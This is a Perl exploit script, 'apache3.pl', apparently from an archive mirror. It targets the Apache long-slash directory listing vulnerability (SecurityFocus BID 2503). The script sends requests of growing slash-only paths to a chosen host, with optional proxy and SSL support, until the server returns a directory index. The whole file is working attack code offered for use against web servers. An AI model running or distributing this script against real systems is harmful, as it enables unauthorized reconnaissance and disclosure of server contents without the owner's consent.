home *** CD-ROM | disk | FTP | other *** search
- #!/usr/bin/perl
- #
- # orginal by farm9, Inc. (copyright 2001)
- # then modified by Siberian (www.sentry-labs.com)
- # with more modifications by rfp (www.wiretrip.net/rfp/)
- #
- ##########################################################################
-
- use libwhisker;
- use Getopt::Std;
-
- # apache3.pl
- # this exploit was modified to use the libwhisker library, which gives
- # HTTP/1.1, proxy, and SSL support. Plus, small other changes.
-
- $|++;
- my (%hin,%hout,%args);
-
- print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
- print "SecurityFocus BID 2503\n\n";
- print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
- print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
- print "Moved to libwhisker by rfp\n\n";
-
- getopts("p:L:H:sP:R:h:",\%args);
-
- if($args{h} eq ''){
- print 'Usage: ./apache3.pl <options>, where options:',"\n";
- print '-h host host to scan (must be specified)',"\n";
- print '-p ## host port (default: 80)',"\n";
- print '-L ## low end/start of range (default: 1)',"\n";
- print '-H ## high end/end of range (default: 8192)',"\n";
- print '-P host HTTP proxy via host',"\n";
- print '-R ## HTTP proxy port (default: 80)',"\n";
- print '-s use SSL (can\'t be used with proxy)',"\n";
- exit 0;
- }
-
- $low = $args{L} || 1;
- $high = $args{H} || 8192;
-
- &lw::http_init_request(\%hin); # setup our request hash
-
- $hin{'whisker'}->{'host'}= $args{h};
-
- $hin{'whisker'}->{'port'}= $args{p} || 80;
-
- if(defined $args{s}){
- $hin{'whisker'}->{'ssl'} = 1;
-
- if(defined $args{P}){
- print "SSL not currently compatible with proxy\n";
- exit 1;
- }
- }
-
- if(defined $args{'P'}){
- $hin{'whisker'}->{'proxy_host'}=$args{P};
- $hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
- print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
- print "port $hin{'whisker'}->{'proxy_port'}\n";
- }
-
-
- &lw::http_fixup_request(\%hin); # fix any HTTP requirements
-
- for($c=$low; $c<=$high; $c++){
-
- $hin{'whisker'}->{'uri'} = '/' x $c;
-
- if(&lw::http_do_request(\%hin,\%hout)){
- print "Error: $hout{'whisker'}->{'error'}\n";
- exit 1;
- } else {
- if($hout{'whisker'}->{'http_resp'} == 200 &&
- $hout{'whisker'}->{'data'}=~/index of/i){
-
- print "Found result using $c slashes.\n";
- exit 0;
- }
- }
-
- print "."; # for status
- }
-
- print "\nNot vulnerable (perhaps try a different range).\n";
-
-
-